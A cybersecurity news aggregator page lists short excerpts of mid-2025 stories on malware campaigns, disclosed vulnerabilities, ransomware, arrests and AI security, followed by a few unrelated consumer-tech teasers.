' Cybersecurity News

About This Website

Welcome to our cybersecurity news aggregator! This website gathers news articles from over 60 sources, providing you with a comprehensive and up-to-date overview of the latest happenings in the world of cybersecurity.

We utilize RSS feeds to collect the news, ensuring a streamlined and efficient process. This enables you to stay informed and access a wide variety of perspectives and insights in one convenient location.

Dive into the latest cybersecurity stories and explore the wealth of knowledge available, all in one place.

Cybersecurity News

SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others
SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others

The threat actors behind the SocGholish malware have been observed leveraging Traffic Distribution Systems (TDSs) like Parrot TDS and Keitaro TDS to filter and redirect unsuspecting users to sketchy content. "The core of their operation is a sophisticated Malware-as-a-Service (MaaS) model, where infected systems are sold as initial access points to other cybercriminal organizations," Silent Push

Read More
Webinar: How to Stop Python Supply Chain Attacks—and the Expert Tools You Need
Webinar: How to Stop Python Supply Chain Attacks—and the Expert Tools You Need

Python is everywhere in modern software. From machine learning models to production microservices, chances are your code—and your business—depends on Python packages you didn’t write. But in 2025, that trust comes with a serious risk. Every few weeks, we’re seeing fresh headlines about malicious packages uploaded to the Python Package Index (PyPI)—many going undetected until after they’ve caused

Read More
Malicious Go, npm Packages Deliver Cross-Platform Malware, Trigger Remote Data Wipes
Malicious Go, npm Packages Deliver Cross-Platform Malware, Trigger Remote Data Wipes

Cybersecurity researchers have discovered a set of 11 malicious Go packages that are designed to download additional payloads from remote servers and execute them on both Windows and Linux systems. "At runtime the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command-and-control (C2) endpoints, and executes it in memory," Socket security

Read More
The AI-Powered Security Shift: What 2025 Is Teaching Us About Cloud Defense
The AI-Powered Security Shift: What 2025 Is Teaching Us About Cloud Defense

Now that we are well into 2025, cloud attacks are evolving faster than ever and artificial intelligence (AI) is both a weapon and a shield. As AI rapidly changes how enterprises innovate, security teams are now tasked with a triple burden: Secure AI embedded in every part of the business. Use AI to defend faster and smarter. Fight AI-powered threats that execute in minutes—or seconds. Security

Read More
Microsoft Discloses Exchange Server Flaw Enabling Silent Cloud Access in Hybrid Setups
Microsoft Discloses Exchange Server Flaw Enabling Silent Cloud Access in Hybrid Setups

Microsoft has released an advisory for a high-severity security flaw affecting on-premise versions of Exchange Server that could allow an attacker to gain elevated privileges under certain conditions. The vulnerability, tracked as CVE-2025-53786, carries a CVSS score of 8.0. Dirk-jan Mollema with Outsider Security has been acknowledged for reporting the bug. "In an Exchange hybrid deployment, an

Read More
6,500 Axis Servers Expose Remoting Protocol; 4,000 in U.S. Vulnerable to Exploits
6,500 Axis Servers Expose Remoting Protocol; 4,000 in U.S. Vulnerable to Exploits

Cybersecurity researchers have disclosed multiple security flaws in video surveillance products from Axis Communications that, if successfully exploited, could expose them to takeover attacks. "The attack results in pre-authentication remote code execution on Axis Device Manager, a server used to configure and manage fleets of cameras, and the Axis Camera Station, client software used to view

Read More
SonicWall Confirms Patched Vulnerability Behind Recent VPN Attacks, Not a Zero-Day
SonicWall Confirms Patched Vulnerability Behind Recent VPN Attacks, Not a Zero-Day

SonicWall has revealed that the recent spike in activity targeting its Gen 7 and newer firewalls with SSL VPN enabled is related to an older, now-patched bug and password reuse. "We now have high confidence that the recent SSL VPN activity is not connected to a zero-day vulnerability," the company said. "Instead, there is a significant correlation with threat activity related to CVE-2024-40766."

Read More
Researchers Uncover ECScape Flaw in Amazon ECS Enabling Cross-Task Credential Theft
Researchers Uncover ECScape Flaw in Amazon ECS Enabling Cross-Task Credential Theft

Cybersecurity researchers have demonstrated an "end-to-end privilege escalation chain" in Amazon Elastic Container Service (ECS) that could be exploited by an attacker to conduct lateral movement, access sensitive data, and seize control of the cloud environment. The attack technique has been codenamed ECScape by Sweet Security researcher Naor Haziz, who presented the findings today at the

Read More
Fake VPN and Spam Blocker Apps Tied to VexTrio Used in Ad Fraud, Subscription Scams
Fake VPN and Spam Blocker Apps Tied to VexTrio Used in Ad Fraud, Subscription Scams

The malicious ad tech purveyor known as VexTrio Viper has been observed developing several malicious apps that have been published on Apple and Google's official app storefronts under the guise of seemingly useful applications. These apps masquerade as VPNs, device "monitoring" apps, RAM cleaners, dating services, and spam blockers, DNS threat intelligence firm Infoblox said in an exhaustive

Read More
AI Slashes Workloads for vCISOs by 68% as SMBs Demand More – New Report Reveals
AI Slashes Workloads for vCISOs by 68% as SMBs Demand More – New Report Reveals

As the volume and sophistication of cyber threats and risks grow, cybersecurity has become mission-critical for businesses of all sizes. To address this shift, SMBs have been urgently turning to vCISO services to keep up with escalating threats and compliance demands. A recent report by Cynomi has found that a full 79% of MSPs and MSSPs see high demand for vCISO services among SMBs. How are

Read More
Microsoft Launches Project Ire to Autonomously Classify Malware Using AI Tools
Microsoft Launches Project Ire to Autonomously Classify Malware Using AI Tools

Microsoft on Tuesday announced an autonomous artificial intelligence (AI) agent that can analyze and classify software without assistance in an effort to advance malware detection efforts. The large language model (LLM)-powered autonomous malware classification system, currently a prototype, has been codenamed Project Ire by the tech giant. The system "automates what is considered the gold

Read More
Trend Micro Confirms Active Exploitation of Critical Apex One Flaws in On-Premise Systems
Trend Micro Confirms Active Exploitation of Critical Apex One Flaws in On-Premise Systems

Trend Micro has released mitigations to address critical security flaws in on-premise versions of Apex One Management Console that it said have been exploited in the wild. The vulnerabilities (CVE-2025-54948 and CVE-2025-54987), both rated 9.4 on the CVSS scoring system, have been described as management console command injection and remote code execution flaws. "A vulnerability in Trend Micro

Read More
CERT-UA Warns of HTA-Delivered C# Malware Attacks Using Court Summons Lures
CERT-UA Warns of HTA-Delivered C# Malware Attacks Using Court Summons Lures

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks carried out by a threat actor called UAC-0099 targeting government agencies, the defense forces, and enterprises of the defense-industrial complex in the country. The attacks, which leverage phishing emails as an initial compromise vector, are used to deliver malware families like MATCHBOIL, MATCHWOK, and

Read More
AI Is Transforming Cybersecurity Adversarial Testing - Pentera Founder’s Vision
AI Is Transforming Cybersecurity Adversarial Testing - Pentera Founder’s Vision

When Technology Resets the Playing Field In 2015 I founded a cybersecurity testing software company with the belief that automated penetration testing was not only possible, but necessary. At the time, the idea was often met with skepticism, but today, with 1200+ of enterprise customers and thousands of users, that vision has proven itself. But I also know that what we’ve built so far is only

Read More
CISA Adds 3 D-Link Vulnerabilities to KEV Catalog Amid Active Exploitation Evidence
CISA Adds 3 D-Link Vulnerabilities to KEV Catalog Amid Active Exploitation Evidence

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added three old security flaws impacting D-Link Wi-Fi cameras and video recorders to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation in the wild. The high-severity vulnerabilities, which are from 2020 and 2022, are listed below - CVE-2020-25078 (CVSS score: 7.5) - An

Read More
ClickFix Malware Campaign Exploits CAPTCHAs to Spread Cross-Platform Infections
ClickFix Malware Campaign Exploits CAPTCHAs to Spread Cross-Platform Infections

A combination of propagation methods, narrative sophistication, and evasion techniques enabled the social engineering tactic known as ClickFix to take off the way it did over the past year, according to new findings from Guardio Labs. "Like a real-world virus variant, this new 'ClickFix' strain quickly outpaced and ultimately wiped out the infamous fake browser update scam that plagued the web

Read More
Google’s August Patch Fixes Two Qualcomm Vulnerabilities Exploited in the Wild
Google’s August Patch Fixes Two Qualcomm Vulnerabilities Exploited in the Wild

Google has released security updates to address multiple security flaws in Android, including fixes for two Qualcomm bugs that were flagged as actively exploited in the wild. The vulnerabilities include CVE-2025-21479 (CVSS score: 8.6) and CVE-2025-27038 (CVSS score: 7.5), both of which were disclosed alongside CVE-2025-21480 (CVSS score: 8.6), by the chipmaker back in June 2025. CVE-2025-21479

Read More
Cursor AI Code Editor Vulnerability Enables RCE via Malicious MCP File Swaps Post Approval
Cursor AI Code Editor Vulnerability Enables RCE via Malicious MCP File Swaps Post Approval

Cybersecurity researchers have disclosed a high-severity security flaw in the artificial intelligence (AI)-powered code editor Cursor that could result in remote code execution. The vulnerability, tracked as CVE-2025-54136 (CVSS score: 7.2), has been codenamed MCPoison by Check Point Research, owing to the fact that it exploits a quirk in the way the software handles modifications to Model

Read More
Misconfigurations Are Not Vulnerabilities: The Costly Confusion Behind Security Risks
Misconfigurations Are Not Vulnerabilities: The Costly Confusion Behind Security Risks

In SaaS security conversations, “misconfiguration” and “vulnerability” are often used interchangeably. But they’re not the same thing. And misunderstanding that distinction can quietly create real exposure. This confusion isn’t just semantics. It reflects a deeper misunderstanding of the shared responsibility model, particularly in SaaS environments where the line between vendor and customer

Read More
How Top CISOs Save Their SOCs from Alert Chaos to Never Miss Real Incidents
How Top CISOs Save Their SOCs from Alert Chaos to Never Miss Real Incidents

Why do SOC teams still drown in alerts even after spending big on security tools? False positives pile up, stealthy threats slip through, and critical incidents get buried in the noise. Top CISOs have realized the solution isn’t adding more and more tools to SOC workflows but giving analysts the speed and visibility they need to catch real attacks before they cause damage.  Here’s how

Read More
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign

Cybersecurity researchers have lifted the veil on a widespread malicious campaign that's targeting TikTok Shop users globally with an aim to steal credentials and distribute trojanized apps. "Threat actors are exploiting the official in-app e-commerce platform through a dual attack strategy that combines phishing and malware to target users," CTM360 said. "The core tactic involves a deceptive

Read More
SonicWall Investigating Potential SSL VPN Zero-Day After 20+ Targeted Attacks Reported
SonicWall Investigating Potential SSL VPN Zero-Day After 20+ Targeted Attacks Reported

SonicWall said it's actively investigating reports to determine if there is a new zero-day vulnerability following reports of a spike in Akira ransomware actors in late July 2025. "Over the past 72 hours, there has been a notable increase in both internally and externally reported cyber incidents involving Gen 7 SonicWall firewalls where SSLVPN is enabled," the network security vendor said in a

Read More
NVIDIA Triton Bugs Let Unauthenticated Attackers Execute Code and Hijack AI Servers
NVIDIA Triton Bugs Let Unauthenticated Attackers Execute Code and Hijack AI Servers

A newly disclosed set of security flaws in NVIDIA's Triton Inference Server for Windows and Linux, an open-source platform for running artificial intelligence (AI) models at scale, could be exploited to take over susceptible servers. "When chained together, these flaws can potentially allow a remote, unauthenticated attacker to gain complete control of the server, achieving remote code execution

Read More
Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally
Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally

Cybersecurity researchers are calling attention to a new wave of campaigns distributing a Python-based information stealer called PXA Stealer. The malicious activity has been assessed to be the work of Vietnamese-speaking cybercriminals who monetize the stolen data through a subscription-based underground ecosystem that automates the resale and reuse via Telegram APIs, according to a joint

Read More
⚡ Weekly Recap: VPN 0-Day, Encryption Backdoor, AI Malware, macOS Flaw, ATM Hack & More
⚡ Weekly Recap: VPN 0-Day, Encryption Backdoor, AI Malware, macOS Flaw, ATM Hack & More

Malware isn’t just trying to hide anymore—it’s trying to belong. We’re seeing code that talks like us, logs like us, even documents itself like a helpful teammate. Some threats now look more like developer tools than exploits. Others borrow trust from open-source platforms, or quietly build themselves out of AI-written snippets. It’s not just about being malicious—it’s about being believable.

Read More
Man-in-the-Middle Attack Prevention Guide
Man-in-the-Middle Attack Prevention Guide

Some of the most devastating cyberattacks don’t rely on brute force, but instead succeed through stealth. These quiet intrusions often go unnoticed until long after the attacker has disappeared. Among the most insidious are man-in-the-middle (MITM) attacks, where criminals exploit weaknesses in communication protocols to silently position themselves between two unsuspecting parties

Read More
New ‘Plague’ PAM Backdoor Exposes Critical Linux Systems to Silent Credential Theft
New ‘Plague’ PAM Backdoor Exposes Critical Linux Systems to Silent Credential Theft

Cybersecurity researchers have flagged a previously undocumented Linux backdoor dubbed Plague that has managed to evade detection for a year. "The implant is built as a malicious PAM (Pluggable Authentication Module), enabling attackers to silently bypass system authentication and gain persistent SSH access," Nextron Systems researcher Pierre-Henri Pezier said. Pluggable Authentication Modules

Read More
The Wild West of Shadow IT
The Wild West of Shadow IT

Everyone’s an IT decision-maker now. The employees in your organization can install a plugin with just one click, and they don’t need to clear it with your team first. It’s great for productivity, but it’s a serious problem for your security posture. When the floodgates of SaaS and AI opened, IT didn’t just get democratized, its security got outpaced. Employees are onboarding apps faster than

Read More
PlayPraetor Android Trojan Infects 11,000+ Devices via Fake Google Play Pages and Meta Ads
PlayPraetor Android Trojan Infects 11,000+ Devices via Fake Google Play Pages and Meta Ads

Cybersecurity researchers have discovered a nascent Android remote access trojan (RAT) called PlayPraetor that has infected more than 11,000 devices, primarily across Portugal, Spain, France, Morocco, Peru, and Hong Kong. "The botnet's rapid growth, which now exceeds 2,000 new infections per week, is driven by aggressive campaigns focusing on Spanish and French speakers, indicating a strategic

Read More
CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign
CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign

Telecommunications organizations in Southeast Asia have been targeted by a state-sponsored threat actor known as CL-STA-0969 to facilitate remote control over compromised networks. Palo Alto Networks Unit 42 said it observed multiple incidents in the region, including one aimed at critical telecommunications infrastructure between February and November 2024. The attacks are characterized by the

Read More
Akira Ransomware Exploits SonicWall VPNs in Likely Zero-Day Attack on Fully-Patched Devices
Akira Ransomware Exploits SonicWall VPNs in Likely Zero-Day Attack on Fully-Patched Devices

SonicWall SSL VPN devices have become the target of Akira ransomware attacks as part of a newfound surge in activity observed in late July 2025. "In the intrusions reviewed, multiple pre-ransomware intrusions were observed within a short period of time, each involving VPN access through SonicWall SSL VPNs," Arctic Wolf Labs researcher Julian Tuin said in a report. The cybersecurity company

Read More
Cursor AI Code Editor Fixed Flaw Allowing Attackers to Run Commands via Prompt Injection
Cursor AI Code Editor Fixed Flaw Allowing Attackers to Run Commands via Prompt Injection

Cybersecurity researchers have disclosed a now-patched, high-severity security flaw in Cursor, a popular artificial intelligence (AI) code editor, that could result in remote code execution (RCE). The vulnerability, tracked as CVE-2025-54135 (CVSS score: 8.6), has been addressed in version 1.3 released on July 29, 2025. It has been codenamed CurXecute by Aim Labs, which previously disclosed

Read More
Attackers Use Fake OAuth Apps with Tycoon Kit to Breach Microsoft 365 Accounts
Attackers Use Fake OAuth Apps with Tycoon Kit to Breach Microsoft 365 Accounts

Cybersecurity researchers have detailed a new cluster of activity where threat actors are impersonating enterprises with fake Microsoft OAuth applications to facilitate credential harvesting as part of account takeover attacks. "The fake Microsoft 365 applications impersonate various companies, including RingCentral, SharePoint, Adobe, and Docusign," Proofpoint said in a Thursday report. The

Read More
AI-Generated Malicious npm Package Drains Solana Funds from 1,500+ Before Takedown
AI-Generated Malicious npm Package Drains Solana Funds from 1,500+ Before Takedown

Cybersecurity researchers have flagged a malicious npm package that was generated using artificial intelligence (AI) and concealed a cryptocurrency wallet drainer. The package, @kodane/patch-manager, claims to offer "advanced license validation and registry optimization utilities for high-performance Node.js applications." It was uploaded to npm by a user named "Kodane" on July 28, 2025. The

Read More
You Are What You Eat: Why Your AI Security Tools Are Only as Strong as the Data You Feed Them
You Are What You Eat: Why Your AI Security Tools Are Only as Strong as the Data You Feed Them

Just as triathletes know that peak performance requires more than expensive gear, cybersecurity teams are discovering that AI success depends less on the tools they deploy and more on the data that powers them The junk food problem in cybersecurity Imagine a triathlete who spares no expense on equipment—carbon fiber bikes, hydrodynamic wetsuits, precision GPS watches—but fuels their

Read More
Storm-2603 Deploys DNS-Controlled Backdoor in Warlock and LockBit Ransomware Attacks
Storm-2603 Deploys DNS-Controlled Backdoor in Warlock and LockBit Ransomware Attacks

The threat actor linked to the exploitation of the recently disclosed security flaws in Microsoft SharePoint Server is using a bespoke command-and-control (C2) framework called AK47 C2 (also spelled ak47c2) in its operations. The framework includes at least two different types of clients, HTTP-based and Domain Name System (DNS)-based, which have been dubbed AK47HTTP and AK47DNS, respectively, by

Read More
Secret Blizzard Deploys Malware in ISP-Level AitM Attacks on Moscow Embassies
Secret Blizzard Deploys Malware in ISP-Level AitM Attacks on Moscow Embassies

The Russian nation-state threat actor known as Secret Blizzard has been observed orchestrating a new cyber espionage campaign targeting foreign embassies located in Moscow by means of an adversary-in-the-middle (AitM) attack at the Internet Service Provider (ISP) level and delivering a custom malware dubbed ApolloShadow. "ApolloShadow has the capability to install a trusted root certificate to

Read More
Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials
Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials

Cybersecurity researchers have disclosed details of a new phishing campaign that conceals malicious payloads by abusing link wrapping services from Proofpoint and Intermedia to bypass defenses. "Link wrapping is designed by vendors like Proofpoint to protect users by routing all clicked URLs through a scanning service, allowing them to block known malicious destinations at the moment of click,"

Read More
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto

The North Korea-linked threat actor known as UNC4899 has been attributed to attacks targeting two different organizations by approaching their employees via LinkedIn and Telegram. "Under the guise of freelance opportunities for software development work, UNC4899 leveraged social engineering techniques to successfully convince the targeted employees to execute malicious Docker containers in their

Read More
AI-Driven Trends in Endpoint Security: What the 2025 Gartner® Magic Quadrant™ Reveals
AI-Driven Trends in Endpoint Security: What the 2025 Gartner® Magic Quadrant™ Reveals

Cyber threats and attacks like ransomware continue to increase in volume and complexity with the endpoint typically being the most sought after and valued target. With the rapid expansion and adoption of AI, it is more critical than ever to ensure the endpoint is adequately secured by a platform capable of not just keeping pace, but staying ahead of an ever-evolving threat landscape.

Read More
UNC2891 Breaches ATM Network via 4G Raspberry Pi, Tries CAKETAP Rootkit for Fraud
UNC2891 Breaches ATM Network via 4G Raspberry Pi, Tries CAKETAP Rootkit for Fraud

The financially motivated threat actor known as UNC2891 has been observed targeting Automatic Teller Machine (ATM) infrastructure using a 4G-equipped Raspberry Pi as part of a covert attack. The cyber-physical attack involved the adversary leveraging their physical access to install the Raspberry Pi device and have it connected directly to the same network switch as the ATM, effectively placing

Read More
Alert Fatigue, Data Overload, and the Fall of Traditional SIEMs
Alert Fatigue, Data Overload, and the Fall of Traditional SIEMs

Security Operations Centers (SOCs) are stretched to their limits. Log volumes are surging, threat landscapes are growing more complex, and security teams are chronically understaffed. Analysts face a daily battle with alert noise, fragmented tools, and incomplete data visibility. At the same time, more vendors are phasing out their on-premises SIEM solutions, encouraging migration to SaaS

Read More
Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install
Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install

Threat actors are actively exploiting a critical security flaw in "Alone – Charity Multipurpose Non-profit WordPress Theme" to take over susceptible sites. The vulnerability, tracked as CVE-2025-5394, carries a CVSS score of 9.8. Security researcher Thái An has been credited with discovering and reporting the bug. According to Wordfence, the shortcoming relates to an arbitrary file upload

Read More
Hackers Use Facebook Ads to Spread JSCEAL Malware via Fake Cryptocurrency Trading Apps
Hackers Use Facebook Ads to Spread JSCEAL Malware via Fake Cryptocurrency Trading Apps

Cybersecurity researchers are calling attention to an ongoing campaign that distributes fake cryptocurrency trading apps to deploy a compiled V8 JavaScript (JSC) malware called JSCEAL that can capture data such as credentials and wallets. The activity leverages thousands of malicious advertisements posted on Facebook in an attempt to redirect unsuspecting victims to counterfeit sites that

Read More
FunkSec Ransomware Decryptor Released Free to Public After Group Goes Dormant
FunkSec Ransomware Decryptor Released Free to Public After Group Goes Dormant

Cybersecurity experts have released a decryptor for a ransomware strain called FunkSec, allowing victims to recover access to their files for free. "Because the ransomware is now considered dead, we released the decryptor for public download," Gen Digital researcher Ladislav Zezula said. FunkSec, which emerged towards the end of 2024, has claimed 172 victims, according to data from

Read More
Product Walkthrough: A Look Inside Pillar's AI Security Platform
Product Walkthrough: A Look Inside Pillar's AI Security Platform

In this article, we will provide a brief overview of Pillar Security's platform to better understand how they are tackling AI security challenges. Pillar Security is building a platform to cover the entire software development and deployment lifecycle with the goal of providing trust in AI systems. Using its holistic approach, the platform introduces new ways of detecting AI threats, beginning

Read More
Apple Patches Safari Vulnerability Also Exploited as Zero-Day in Google Chrome
Apple Patches Safari Vulnerability Also Exploited as Zero-Day in Google Chrome

Apple on Tuesday released security updates for its entire software portfolio, including a fix for a vulnerability that Google said was exploited as a zero-day in the Chrome web browser earlier this month. The vulnerability, tracked as CVE-2025-6558 (CVSS score: 8.8), is an incorrect validation of untrusted input in the browser's ANGLE and GPU components that could result in a sandbox escape via

Read More
Critical Dahua Camera Flaws Enable Remote Hijack via ONVIF and File Upload Exploits
Critical Dahua Camera Flaws Enable Remote Hijack via ONVIF and File Upload Exploits

Cybersecurity researchers have disclosed now-patched critical security flaws in the firmware of Dahua smart cameras that, if left unaddressed, could allow attackers to hijack control of susceptible devices. "The flaws, affecting the device's ONVIF protocol and file upload handlers, allow unauthenticated attackers to execute arbitrary commands remotely, effectively taking over the device,"

Read More
Chinese Firms Linked to Silk Typhoon Filed 15+ Patents for Cyber Espionage Tools
Chinese Firms Linked to Silk Typhoon Filed 15+ Patents for Cyber Espionage Tools

Chinese companies linked to the state-sponsored hacking group known as Silk Typhoon (aka Hafnium) have been identified as behind over a dozen technology patents, shedding light on the shadowy cyber contracting ecosystem and its offensive capabilities. The patents cover forensics and intrusion tools that enable encrypted endpoint data collection, Apple device forensics, and remote access to

Read More
Google Launches DBSC Open Beta in Chrome and Enhances Patch Transparency via Project Zero
Google Launches DBSC Open Beta in Chrome and Enhances Patch Transparency via Project Zero

Google has announced that it's making available a security feature called Device Bound Session Credentials (DBSC) in open beta to ensure that users are safeguarded against session cookie theft attacks. DBSC, first introduced as a prototype in April 2024, is designed to bind authentication sessions to a device so as to prevent threat actors from using stolen cookies to sign-in to victims'

Read More
Who Got Arrested in the Raid on the XSS Crime Forum?
Who Got Arrested in the Raid on the XSS Crime Forum?

On July 22, 2025, the European police agency Europol said a long-running investigation led by the French Police resulted in the arrest of a 38-year-old administrator of XSS, a Russian-language cybercrime forum with more than 50,000 members. The action has triggered an ongoing frenzy of speculation and panic among XSS denizens about the identity of the unnamed suspect, but the consensus is that he is a pivotal figure in the crime forum scene who goes by the hacker handle "Toha." Here's a deep dive on what's knowable about Toha, and a short stab at who got nabbed.

Read More
Scammers Unleash Flood of Slick Online Gaming Sites
Scammers Unleash Flood of Slick Online Gaming Sites

Fraudsters are flooding Discord and other social media platforms with ads for hundreds of polished online gaming and wagering websites that lure people with free credits and eventually abscond with any cryptocurrency funds deposited by players. Here's a closer look at the social engineering tactics and remarkable traits of this sprawling network of more than 1,200 scam sites.

Read More
Phishers Target Aviation Execs to Scam Customers
Phishers Target Aviation Execs to Scam Customers

KrebsOnSecurity recently heard from a reader whose boss's email account got phished and was used to trick one of the company's customers into sending a large payment to scammers. An investigation into the attacker's infrastructure points to a long-running Nigerian cybercrime group that is actively targeting established companies in the transportation and aviation industries.

Read More
Microsoft Fix Targets Attacks on SharePoint Zero-Day
Microsoft Fix Targets Attacks on SharePoint Zero-Day

On Sunday, July 20, Microsoft Corp. issued an emergency security update for a vulnerability in SharePoint Server that is actively being exploited to compromise vulnerable organizations. The patch comes amid reports that malicious hackers have used the Sharepoint flaw to breach U.S. federal and state agencies, universities, and energy companies.

Read More
Poor Passwords Tattle on AI Hiring Bot Maker Paradox.ai
Poor Passwords Tattle on AI Hiring Bot Maker Paradox.ai

Security researchers recently revealed that the personal information of millions of people who applied for jobs at McDonald's was exposed after they guessed the password ("123456") for the fast food chain's account at Paradox.ai, a company that makes artificial intelligence based hiring chatbots used by many Fortune 500 companies. Paradox.ai said the security oversight was an isolated incident that did not affect its other customers, but recent security breaches involving its employees in Vietnam tell a more nuanced story.

Read More
DOGE Denizen Marko Elez Leaked API Key for xAI
DOGE Denizen Marko Elez Leaked API Key for xAI

Marko Elez, a 25-year-old employee at Elon Musk's Department of Government Efficiency (DOGE), has been granted access to sensitive databases at the U.S. Social Security Administration, the Treasury and Justice departments, and the Department of Homeland Security. So it should fill all Americans with a deep sense of confidence to learn that Mr. Elez over the weekend inadvertently published a private key that allowed anyone to interact directly with more than four dozen large language models (LLMs) developed by Musk's artificial intelligence company xAI.

Read More
UK Arrests Four in ‘Scattered Spider’ Ransom Group
UK Arrests Four in ‘Scattered Spider’ Ransom Group

Authorities in the United Kingdom this week arrested four alleged members of "Scattered Spider," a prolific data theft and extortion group whose recent victims include multiple airlines and the U.K. retail chain Marks & Spencer.

Read More
Microsoft Patch Tuesday, July 2025 Edition
Microsoft Patch Tuesday, July 2025 Edition

Microsoft today released updates to fix at least 137 security vulnerabilities in its Windows operating systems and supported software. None of the weaknesses addressed this month are known to be actively exploited, but 14 of the flaws earned Microsoft's most-dire "critical" rating, meaning they could be exploited to seize control over vulnerable Windows PCs with little or no help from users.

Read More
Big Tech’s Mixed Response to U.S. Treasury Sanctions
Big Tech’s Mixed Response to U.S. Treasury Sanctions

In May 2025, the U.S. government sanctioned a Chinese national for operating a cloud provider linked to the majority of virtual currency investment scam websites reported to the FBI. But more than a month later, the accused continues to openly operate accounts at a slew of American tech companies, including Facebook, Github, LinkedIn, PayPal and Twitter/X.

Read More
Senator Chides FBI for Weak Advice on Mobile Security
Senator Chides FBI for Weak Advice on Mobile Security

Agents with the Federal Bureau of Investigation (FBI) briefed Capitol Hill staff recently on hardening the security of their mobile devices, after a contacts list stolen from the personal phone of the White House Chief of Staff Susie Wiles was reportedly used to fuel a series of text messages and phone calls impersonating her to U.S. lawmakers. But in a letter this week to the FBI, one of the Senate's most tech-savvy lawmakers says the feds aren't doing enough to recommend more appropriate security protections that are already built into most consumer mobile devices.

Read More
China Accuses Nvidia of Putting Backdoors into Their Chips
China Accuses Nvidia of Putting Backdoors into Their Chips

The government of China has accused Nvidia of inserting a backdoor into their H20 chips:

China’s cyber regulator on Thursday said it had held a meeting with Nvidia over what it called “serious security issues” with the company’s artificial intelligence chips. It said US AI experts had “revealed that Nvidia’s computing chips have location tracking and can remotely shut down the technology.”

Read More
The Semiconductor Industry and Regulatory Compliance
The Semiconductor Industry and Regulatory Compliance

Earlier this week, the Trump administration narrowed export controls on advanced semiconductors ahead of US-China trade negotiations. The administration is increasingly relying on export licenses to allow American semiconductor firms to sell their products to Chinese customers, while keeping the most powerful of them out of the hands of our military adversaries. These are the chips that power the artificial intelligence research fueling China’s technological rise, as well as the advanced military equipment underpinning Russia’s invasion of Ukraine...

Read More
Surveilling Your Children with AirTags
Surveilling Your Children with AirTags

Skechers is making a line of kid’s shoes with a hidden compartment for an AirTag.

Read More
First Sentencing in Scheme to Help North Koreans Infiltrate US Companies
First Sentencing in Scheme to Help North Koreans Infiltrate US Companies

An Arizona woman was sentenced to eight-and-a-half years in prison for her role helping North Korean workers infiltrate US companies by pretending to be US workers.

From an article:

According to court documents, Chapman hosted the North Korean IT workers’ computers in her own home between October 2020 and October 2023, creating a so-called “laptop farm” which was used to make it appear as though the devices were located in the United States.

The North Koreans were hired as remote software and application developers with multiple Fortune 500 companies, including an aerospace and defense company, a major television network, a Silicon Valley technology company, and a high-profile company...

Read More
Friday Squid Blogging: A Case of Squid Fossil Misidentification
Friday Squid Blogging: A Case of Squid Fossil Misidentification

What scientists thought were squid fossils were actually arrow worms.

Read More
Spying on People Through Airportr Luggage Delivery Service
Spying on People Through Airportr Luggage Delivery Service

Airportr is a service that allows passengers to have their luggage picked up, checked, and delivered to their destinations. As you might expect, it’s used by wealthy or important people. So if the company’s website is insecure, you’d be able to spy on lots of wealthy or important people. And maybe even steal their luggage.

Researchers at the firm CyberX9 found that simple bugs in Airportr’s website allowed them to access virtually all of those users’ personal information, including travel plans, or even gain administrator privileges that would have allowed a hacker to redirect or steal luggage in transit. Among even the small sample of user data that the researchers reviewed and shared with WIRED they found what appear to be the personal information and travel records of multiple government officials and diplomats from the UK, Switzerland, and the US...

Read More
Cheating on Quantum Computing Benchmarks
Cheating on Quantum Computing Benchmarks

Peter Gutmann and Stephan Neuhaus have a new paper—I think it’s new, even though it has a March 2025 date—that makes the argument that we shouldn’t trust any of the quantum factorization benchmarks, because everyone has been cooking the books:

Similarly, quantum factorisation is performed using sleight-of-hand numbers that have been selected to make them very easy to factorise using a physics experiment and, by extension, a VIC-20, an abacus, and a dog. A standard technique is to ensure that the factors differ by only a few bits that can then be found using a simple search-based approach that has nothing to do with factorisation…. Note that such a value would never be encountered in the real world since the RSA key generation process typically requires that |p-q| > 100 or more bits [9]. As one analysis puts it, “Instead of waiting for the hardware to improve by yet further orders of magnitude, researchers began inventing better and better tricks for factoring numbers by exploiting their hidden structure” [10]...

Read More
Measuring the Attack/Defense Balance
Measuring the Attack/Defense Balance

“Who’s winning on the internet, the attackers or the defenders?”

I’m asked this all the time, and I can only ever give a qualitative hand-wavy answer. But Jason Healey and Tarang Jain’s latest Lawfare piece has amassed data.

The essay provides the first framework for metrics about how we are all doing collectively—and not just how an individual network is doing. Healey wrote to me in email:

The work rests on three key insights: (1) defenders need a framework (based in threat, vulnerability, and consequence) to categorize the flood of potentially relevant security metrics; (2) trends are what matter, not specifics; and (3) to start, we should avoid getting bogged down in collecting data and just use what’s already being reported by amazing teams at Verizon, Cyentia, Mandiant, IBM, FBI, and so many others...

Read More
Aeroflot Hacked
Aeroflot Hacked

Looks serious.

Read More
That Time Tom Lehrer Pranked the NSA
That Time Tom Lehrer Pranked the NSA

Bluesky thread. Here’s the paper, from 1957. Note reference 3.

Read More
These Sony headphones are a fan favorite - and they're on sale at Amazon at a new low price
These Sony headphones are a fan favorite - and they're on sale at Amazon at a new low price

The widely loved Sony WH-1000XM4 headphones are currently $152 off.

Read More
Android phone feeling slow? How I changed one setting to instantly double the speed
Android phone feeling slow? How I changed one setting to instantly double the speed

